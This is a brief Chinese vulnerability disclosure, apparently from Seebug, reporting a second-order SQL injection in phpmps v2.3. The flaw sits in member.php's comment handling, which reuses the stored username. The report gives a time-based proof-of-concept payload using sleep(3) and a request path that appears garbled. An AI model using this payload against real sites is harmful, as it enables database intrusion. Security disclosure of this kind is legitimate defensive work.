phpmps 注入

### 简要描述： phpmps 注入 ### 详细说明： member.php 的comment流程中，使用了$_username存在二次注入 [<img src="https://images.seebug.org/upload/201504/07175245063bb412c9d95ded4d7a4ba99682c281.jpg" alt="phpmps5.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07175245063bb412c9d95ded4d7a4ba99682c281.jpg) ### 漏洞证明： 注册一个 xxxxx\ 的用户并登陆，提交请求如下，可以看到延迟效果和执行的语句。 POC: POST /phpmps_v2.3_build150302_utf8https://images.seebug.org/upload/member.php?act=comment id=1&content=,1,1,1,sleep(3)) -- a [<img src="https://images.seebug.org/upload/201504/07175304f78f3a03525d9e6a4ca740c5d0c192f3.jpg" alt="phpmps6.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07175304f78f3a03525d9e6a4ca740c5d0c192f3.jpg)